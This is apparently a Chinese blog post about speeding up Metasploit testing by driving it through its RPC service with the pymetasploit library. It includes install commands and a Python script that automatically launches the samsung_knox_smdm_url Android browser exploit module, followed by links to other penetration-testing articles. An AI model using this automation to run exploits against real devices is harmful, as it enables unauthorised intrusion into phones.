Metasploit快速测试脚本的TIPS

最新推荐文章于 2025-03-09 00:14:28 发布
最新推荐文章于 2025-03-09 00:14:28 发布
阅读量226 收藏
点赞数
分类专栏: 安全开发 业务安全 实战篇 文章标签: tips 测试脚本 metasploit 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/92651134
版权

在这里插入图片描述

相信用过metasploit的同学都很苦逼,msfconsole漫长的启动时间,如果测试中敲错命令,或不小心退出后又重启任务,会让你直接抓狂。之前不想重复敲命令,看了下metasploit的开发文档,发现要自动化有各种方案,个人感觉最方便的是调用RPC接口,GITHUB上搜了把,发现有大拿封装好了模块,直接调用即可:

安装pymetasploit模块

git clone https://github.com/allfro/pymetasploit

切到目录

sudo python setup.py install

启动metasploit的RPC服务

msfrpcd -P test -n -f -a 127.0.0.1

这个test是rpc服务的密码,用户名默认是msf
定制自己的测试脚本
我这里定制的是测试三星knox漏洞的脚本,思路是每次启动先把之前运行的job和console停掉,然后自动创建一个console自动敲入命令进行新的漏洞测试,直接crtl-c结束脚本再重新测试都是一个新的job,而且每次测试都是秒开,不用再重启msfconsole了。中间各种接口怎么用,推荐大家再翻下官方的文档。

from metasploit.msfrpc import MsfRpcClient
import time
 
client = MsfRpcClient('test')
 
jobs = client.call('job.list')
for num in jobs.keys():
    if jobs[num].find('samsung_knox_smdm_url')>0:
        client.call('job.stop',num)
 
console = client.call('console.list')
for _console in console['consoles']:
    if _console.has_key('prompt'):
        if _console['prompt'].find('samsung_knox_smdm_url')>0:
            client.call('console.destroy', _console['id'])
 
cmd='''
use exploit/android/browser/samsung_knox_smdm_url
set LHOST 127.0.0.1
exploit
'''
 
res = client.call('console.create')
console_id = res['id']
client.call('console.write', console_id, cmd)
 
try:
    while True:
        res = client.call('console.read',console_id)
        if len(res['data']) > 1:
                print res['data'],
 
        if res['busy'] == True:
                time.sleep(1)
                continue
except:
    pass
内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4790
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 6652
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
msfconsole
汪敏的博客
07-12 1381
msfconsole。
2025年收集的 30 个「优秀实用的油猴脚本」,让我们的浏览器更好用。大部分脚本我也在用挺久了,强烈推荐收藏!第一次接触油猴脚本的小白先看这篇《给你的浏览器开个挂,超详细的油猴脚本
最新发布
重庆AI黑客
03-09 3821
给大家分享 30 个,让我们的浏览器更好用。第一次接触油猴脚本的小白先看这篇《》,超详细的入门教程,快速上手。
从零实现的浏览器Web脚本
WindRunnerMax
11-03 799
在前文中我们探讨了很多关于富文本引擎和协同的能力,在本文中我们更偏向具体的应用组件实现。在一些场景中比如组件库的文档编时,我们希望能够有实时预览的能力,也就是用户可以在文档中直接编代码,然后在页面中实时预览,这样可以让用户更加直观的了解组件的使用方式,这也是很多组件库文档中都会有的一个功能。那么我们在本文就侧重于React组件的实时预览,来探讨相关能力的实现。文中涉及的相关代码都在,在富文本文档中的实现效果可以参考。
msfconsole的简单使用
m0_53603468的博客
12-30 8941
文章目录前言一、入侵步骤二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块,个人感觉也是功能强大的模块,所有的功能都可以该模块下运行。msfweb 是Metasploit framew.
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6051
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 6134
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
渗透测试实用技巧,维护更新指南
1. 工具的选择:了解并熟练运用各种渗透测试工具,如Metasploit、Nmap、Wireshark、Burp Suite等,可以大大提高测试效率。 2. 漏洞利用:掌握常见漏洞的利用方法,比如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造...
SQLMAP使用教程
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1901
用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.
浏览器插件&脚本(自用记录)
qq_41545745的博客
07-31 2568
浏览器插件脚本
浏览器辅助神器:油猴脚本使用教程
热门推荐
詹Sir的博客
03-25 3万+
「油猴脚本」是一段脚本代码,通过它可以让浏览器实现各种各样的扩展功能,和浏览器扩展的作用类似。 比如获去链接重定向、微博页面精简、去广告等,相当于给浏览器开了个挂,可以说是浏览器的辅助神器了! 相信很多用户都是通过度盘下载脚本认识它的,但它的功能远不止此。 本文是一篇 “小白向 · 完全版” 油猴脚本使用教程,安装 -> 使用 -> 脚本推荐,方便不熟悉的用户开启脚本开挂之旅~ 安装 # 1. 安装管理插件 Tampermonkey 是一款浏览器脚本管理插件,常见浏览器如 Chrom
5分钟开发教你零基础开发属于自己的油猴脚本(网页随机变颜色)
weixin_45565886的博客
09-12 8212
5分钟开发教你零基础开发属于自己的油猴脚本(网页随机变颜色)
油猴脚本全解析——让你的浏览器更强大
wujiayu31415的博客
02-20 9847
不同的脚本有不同的功能和用法,因此在使用之前,最好先阅读脚本的说明文档或查看其源代码以了解它是如何工作的。油猴脚本(Tampermonkey)是一款流行的浏览器扩展程序,它允许用户安装和运行自定义的JavaScript脚本,以增强或修改网页的功能。打开Google浏览器或其他支持扩展的浏览器(手机推荐X浏览器)访问Tampermonkey的官方网站,下载并安装适用于你的浏览器的扩展程序。在Tampermonkey的管理面板中,你可以看到已安装的脚本列表,以及每个脚本的详细信息。
2024 年还有人不会安装使用脚本神器?手把手教你
sushengbuhuo的博客
05-16 4096
苏生不惑原创文章,加入我的知识星球之前分享过很多浏览器脚本,不过还是不断有人问我怎么用油猴脚本,今天手把手教你。使用油猴脚本前需要安装油猴浏览器扩展,支持微软edge浏览器 https://microsoftedge.microsoft.com/addons/detail/%E7%AF%A1%E6%94%B9%E7%8C%B4/iikmkjmpaadaobahmlepeloendndfphd 和 ...
实用浏览器脚本
DHclly的博客
02-22 711
原文链接:https://emlog.icedog.top/?post=28。
metasploitmsfconsole使用教程,永恒之蓝漏洞复现
qq_47289634的博客
03-13 2837
msfconsole是metasploit中的一个工具,msfconsole集成了很多漏洞的利用的脚本,永恒之蓝是在 Windows 发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
脚本使用教程
qq_60037094的博客
05-17 1万+
希望我的朋友都可以看上free的视频!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值